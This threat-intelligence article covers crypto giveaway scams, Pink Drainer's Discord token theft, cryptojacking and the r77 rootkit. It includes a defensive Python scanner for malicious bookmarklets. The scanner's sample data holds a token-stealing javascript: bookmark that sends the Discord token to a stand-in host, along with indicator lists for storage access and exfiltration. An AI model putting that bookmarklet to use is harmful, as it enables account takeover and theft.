Cryptocurrency Sucker

"There's a sucker born every minute" is a phrase closely associated with PT Barnum, an American showman of the mid-19th century, although there is no evidence that he said it.  Early examples of its use are among gamblers and confidence tricksters of the era.  A previously undetected cryptocurrency scam has leveraged over 1,000 fraudulent websites to ensnare users into a bogus rewards scheme since at least January 2021.

This massive campaign has likely resulted in thousands of people being scammed worldwide, researchers reported recently, linking it to a Russian-speaking threat actor named "Impulse Team."  The scam is an advance-fee fraud: victims are tricked into believing they have won a certain amount of cryptocurrency, but to collect the "reward" they must first pay a small amount to open an account on the scammers' website.[1]

The compromise chain starts with a direct message propagated via Twitter to lure potential targets into visiting the decoy site.  The account responsible for sending the messages has since been closed.  The message urges recipients to sign up for an account on the website and apply a promo code specified in the message to win a cryptocurrency reward amounting to 0.78632 bitcoin (about $20,300).  But once an account is set up on the fake platform, users are requested to activate it by making a minimal deposit worth 0.01 bitcoin (about $258) to confirm their identity and complete the withdrawal.

While relatively sizable, the amount necessary to activate the account pales compared to what users are promised in return; in reality, recipients never receive anything once they pay the activation amount.  A public Telegram channel that records every victim payment shows that the illicit transactions have yielded the actors a little over $5 million between 24 December 2022 and 08 March 2023.

Investigators reported that they found hundreds of domains related to this fraud, some active as far back as 2016. All the fake websites belong to an affiliate "scam crypto project" codenamed Impulse that's been advertised on Russian cybercrime forums since February 2021.  Like Ransomware-as-a-Service (RaaS) operations, the venture requires affiliate actors to pay a fee to join the program and share a percentage of the earnings with the original authors.  To lend the operation some degree of legitimacy, the threat actors are believed to have created a lookalike version of a known anti-scam tool known as ScamDoc, which assigns a trust score for different websites, in a plausible attempt to pass off the sketchy crypto services as trustworthy.  Researchers documented private messages, online videos, and ads on other social networks, such as TikTok and Mastodon, indicating that the affiliates use various methods to advertise the fraudulent activity.

The threat actor streamlines operations for its affiliates by providing hosting and infrastructure so they can run these scam websites independently.  Affiliates can then concentrate on other aspects of the operation, such as running their own advertising campaigns.

News of the fake giveaway scam coincides with a new wave of cryptocurrency-stealing attacks orchestrated by a threat actor named Pink Drainer, which has been found to masquerade as a journalist to seize control of victims' Discord and Twitter accounts and promote spurious crypto schemes.  According to statistics gathered by ScamSniffer, Pink Drainer had compromised 2,307 accounts as of 11 June 2023 to steal more than $3.29 million worth of digital assets.

With this disguise, they lure unsuspecting victims into mock interviews. Ultimately, they ask for a KYC (know your customer) validation, leading the victims to deceptive websites harboring phishing scripts.  These scripts are designed to pilfer Discord authentication tokens, allowing the perpetrators to take over the victims' Discord accounts without needing traditional credentials or two-factor authentication codes.

Analysts suspect that the hackers may adapt their strategy depending on their targets, “for example, by guiding Discord administrators to open a malicious Carl verification bot and add bookmarks containing malicious code,” ScamSniffer analysts explain.  “After successfully obtaining permissions, hackers will also take a series of measures to make the entire attack process last longer.”

Threat actors take a series of extra steps to ensure their persistence on the compromised accounts, including removing other administrators, committing violations on the main account to attract a Discord ban, and giving administrator privileges to a rogue account.  This aggressive crypto-draining campaign raises the stakes in the cybersecurity landscape: because a stolen session token is accepted in place of a password and a second factor, it shows how little protection credentials and 2FA offer on widely used communication platforms like Discord once the token itself is exfiltrated.
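The token-stealing scripts described above are delivered, among other ways, as browser bookmarks containing malicious code (the "bookmarklet" vector ScamSniffer mentions); a `javascript:` bookmark clicked while Discord is open runs inside the Discord web app's origin and can read the session token that the site keeps in browser storage, which is why the takeover needs neither the password nor a 2FA code.  The following is an added example, not code from the original article, from ScamSniffer or from Discord: a small scanner that reads a Chrome "Bookmarks" JSON export and flags `javascript:` bookmarks, rating them by whether they both touch browser storage or tokens and contain a way to send data out.  The indicator lists, the severity rules and the sample bookmark file are the author's assumptions and constructed test data, not indicators taken from a real Pink Drainer bookmarklet.

```python
"""Flag javascript: bookmarks (bookmarklets) that look like session-token stealers.

Added example for illustration; assumes the Chrome "Bookmarks" JSON layout
({"roots": {"bookmark_bar": {"children": [...]}}}).  Indicator strings and
severity rules are the author's assumptions, not a published signature.
"""
import json
from urllib.parse import unquote

# Constructed sample Chrome Bookmarks file: two javascript: bookmarks, one benign link.
# Not captured from a real victim; the "Verify" entry is a made-up stand-in for the
# malicious bookmark a fake KYC/verification flow would ask an admin to add.
SAMPLE_BOOKMARKS_JSON = json.dumps({
    "roots": {
        "bookmark_bar": {
            "type": "folder",
            "children": [
                {"type": "url", "name": "Discord", "url": "https://discord.com/app"},
                {"type": "url", "name": "Verify",
                 "url": "javascript:(function(){var t=localStorage.getItem('token');"
                        "fetch('https://example.invalid/c?t='+encodeURIComponent(t))})()"},
            ],
        },
        "other": {
            "type": "folder",
            "children": [
                {"type": "url", "name": "Docs", "url": "javascript:void(0)"},
            ],
        },
    }
})

# Assumed indicator lists (matched case-insensitively on the URL-decoded script body).
CREDENTIAL_ACCESS = ("localstorage", "sessionstorage", "indexeddb", "document.cookie", "token")
EXFILTRATION = ("fetch(", "xmlhttprequest", "navigator.sendbeacon", "webhook", "new image(")
OBFUSCATION = ("atob(", "eval(", "string.fromcharcode", "unescape(")


def assess_bookmark(url):
    """Return None for a normal URL, else a dict with severity and matched indicators.

    Bookmarklet bodies are often percent-encoded, so decode before matching.
    """
    decoded = unquote(url or "").strip()
    if not decoded.lower().startswith("javascript:"):
        return None
    body = decoded[len("javascript:"):].lower()
    indicators = {
        "credential_access": [p for p in CREDENTIAL_ACCESS if p in body],
        "exfiltration": [p for p in EXFILTRATION if p in body],
        "obfuscation": [p for p in OBFUSCATION if p in body],
    }
    # Assumed rule: reading storage/tokens AND a network primitive is the stealer pattern;
    # any single class of indicator is worth a look; a bare javascript: bookmark is low.
    if indicators["credential_access"] and indicators["exfiltration"]:
        severity = "high"
    elif any(indicators.values()):
        severity = "medium"
    else:
        severity = "low"
    return {"severity": severity, "indicators": indicators}


def iter_bookmarks(node):
    """Depth-first walk of a Chrome bookmark tree, yielding (name, url) for leaf entries."""
    if node.get("type") == "url":
        yield node.get("name", ""), node.get("url", "")
    for child in node.get("children", []):
        yield from iter_bookmarks(child)


def scan_bookmarks_json(text):
    """Parse a Chrome Bookmarks file and return findings for every javascript: bookmark."""
    data = json.loads(text)
    findings = []
    for root in data.get("roots", {}).values():
        if not isinstance(root, dict):  # Chrome also stores non-folder metadata under roots
            continue
        for name, url in iter_bookmarks(root):
            result = assess_bookmark(url)
            if result is not None:
                findings.append({"name": name, "url": url, **result})
    return findings


if __name__ == "__main__":
    for finding in scan_bookmarks_json(SAMPLE_BOOKMARKS_JSON):
        print(f"[{finding['severity'].upper()}] {finding['name']!r}: {finding['indicators']}")
```

To run it against a real profile, pass the contents of the Chrome `Bookmarks` file to `scan_bookmarks_json` instead of the constructed sample.  Any `javascript:` bookmark on a machine used to administer a Discord server deserves a look, but a bookmark that reads storage and also carries a `fetch(` or webhook call is the combination that matches the token-theft flow described above.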

The findings also come weeks after Akamai took the wraps off a renewed Romanian cryptojacking campaign named Diicot (previously Mexals) that employs a Golang-based Secure Shell (SSH) worm module and a new LAN spreader for propagation.

Recently, Elastic Security Labs detailed a campaign that uses an open-source rootkit called r77 to deploy the XMRig cryptocurrency miner in several Asian countries.  r77's primary purpose is to hide the presence of other software on a system by hooking important Windows APIs, making it an ideal tool for cybercriminals looking to carry out stealthy attacks.

By leveraging the r77 rootkit, the authors of the malicious crypto miner could evade detection and continue their campaign undetected.  The r77 rootkit is also incorporated in SeroXen, a nascent variant of the Quasar remote administration tool that is sold for only US$30 for a monthly license or US$60 for a lifetime bundle.


This article is presented at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com

Weekly Cyber Intelligence Briefings:


REDSHORTS - Weekly Cyber Intelligence Briefings


[1] https://thehackernews.com/2023/06/beware-1000-fake-cryptocurrency-sites.html
